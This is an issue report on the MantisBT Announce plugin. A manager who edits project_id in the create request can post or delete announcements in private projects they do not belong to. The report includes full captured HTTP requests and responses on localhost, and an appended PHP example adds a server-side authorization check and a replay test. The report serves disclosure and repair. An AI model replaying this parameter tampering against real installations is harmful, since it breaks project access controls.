Non authenticated member can post a news to a private project #55

Open
jrckmcsb opened this issue Oct 12, 2020 · 0 comments
When the admin enables the news section, new elements appear, such as the main field used for announcements/news. Some users (managers) can have access to it. However, it seems that a number of security issues are introduced here..

Description

This allows the attacker to post an announcement on a private project even if they are not part of it.

Steps to reproduce

  • Create two projects, one public and one private
  • Enable the news
  • As admin, post a news item to that private project

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=7usorjepb776qjidi5qsg8elb8; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=c16e1a2abfe29f2ae0cd4722fa1d69c8883f2fb7ed79ca412b5b72293cb1e84b; MANTIS_MANAGE_USERS_COOKIE=0%3Ausername%3AASC%3A0; MANTIS_BUG_LIST_COOKIE=9
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002ulRDzusShT_qtfzjQvzOJrSdwaEg2G05&title=AWESOME+NEWS+FOR+PRIVATE+PROJECT&message=AWESOME+NEWS+FOR+PRIVATE+PROJECT&location=header&project_id=1&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:27:50 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:27:51 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:27:51 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

  • Here I am using a private project with a project_id of 1

Manager as attacker

  • Create a new announcement

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|monitored:1; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=2; PHPSESSID=24tihn6miqrj33tjrdleo94ef4; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=v7kQ0OCxCPCnyNcBXEGWqV5Oj4UaowOhahhT0UBedcplivtLAgZS-zGkJQOFiIMj; MANTIS_BUG_LIST_COOKIE=5%2C1%2C4
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002mANdg2UBhW7V-buExLRrPmNcxZ3HrCN2&title=This+is+some+announcement+for+public+project&message=This+is+some+announcement+for+public+project&location=header&project_id=0&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:35:36 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:35:36 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:35:36 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

  • Do the same thing, but this time edit the project_id to any private project
  • Send it
  • The news will be sent to that private project

Some notes

These are the things I observed, but I am not sure if this is just part of the configuration feature (this can be prevented if the admin just sets the configuration to admin..).

Delete news for private project

  • allows the manager to delete the news/announcement for that private project

View the private project name

  • allows the private project name to be disclosed via the news

All of this can be done after going to plugin.php?page=Announce/list. I just added this information.... I believe these issues should be considered for a fix/update.
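The root cause visible in both requests above is that the create handler trusts the client-supplied project_id field instead of deriving authorization from it. The following is an added example of the server-side gate such a handler needs; it is not the Announce plugin's own code and not part of the report. It assumes the MantisBT core API that every plugin page already has loaded (gpc_get_int, access_has_project_level, config_get, project_exists, auth_get_current_user_id, form_security_validate, error_parameters, trigger_error and the ALL_PROJECTS, ERROR_ACCESS_DENIED and ERROR_PROJECT_NOT_FOUND constants); the function name announce_ensure_can_post_to_project and the form name used for the CSRF check are hypothetical.

```php
<?php
# Added example (not part of the Announce plugin or of the issue above).
# Server-side guard for an Announce/create style handler: authorization is
# derived from the *submitted* project_id rather than from whatever project
# the browser cookie or form claims. Assumes the MantisBT core API is loaded,
# as it is for any plugin page. The function name is hypothetical.

require_once( 'core.php' );

/**
 * Abort with ERROR_ACCESS_DENIED unless the current user may post an
 * announcement to $p_project_id.
 *
 * @param int $p_project_id  Target project taken from the form (ALL_PROJECTS = 0).
 * @return int               The validated project id.
 */
function announce_ensure_can_post_to_project( $p_project_id ) {
	$t_user_id = auth_get_current_user_id();
	# Reuse the core manage_project_threshold (MANAGER by default) as the
	# level required to post; a plugin could expose its own config instead.
	$t_threshold = config_get( 'manage_project_threshold' );

	if( $p_project_id == ALL_PROJECTS ) {
		# A site-wide announcement is shown in every project, including private
		# ones, so it needs the threshold at the global (ALL_PROJECTS) level.
		if( !access_has_project_level( $t_threshold, ALL_PROJECTS, $t_user_id ) ) {
			trigger_error( ERROR_ACCESS_DENIED, ERROR );
		}
		return ALL_PROJECTS;
	}

	# Reject unknown ids before any access lookup.
	if( !project_exists( $p_project_id ) ) {
		error_parameters( $p_project_id );
		trigger_error( ERROR_PROJECT_NOT_FOUND, ERROR );
	}

	# access_has_project_level() evaluates the user's effective access on that
	# specific project, so a manager of project 2 who is not a member of
	# private project 1 is refused here even if project_id was edited in the
	# request body.
	if( !access_has_project_level( $t_threshold, $p_project_id, $t_user_id ) ) {
		trigger_error( ERROR_ACCESS_DENIED, ERROR );
	}
	return $p_project_id;
}

# Handler prologue: CSRF token check, then authorization from the submitted id.
form_security_validate( 'plugin_Announce_create' );
auth_ensure_user_authenticated();
$t_project_id = announce_ensure_can_post_to_project( gpc_get_int( 'project_id', ALL_PROJECTS ) );
# ... only after this point create the announcement, and only for $t_project_id
```

The same check belongs in front of the delete and list paths mentioned in the notes, since a delete or list request carries the announcement's project just as the create request carries project_id. To confirm the fix, replay the second request above from a manager account of the public project with project_id set to a private project the account is not a member of: the expected response is the MantisBT access-denied error page, not a 302 back to the list.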
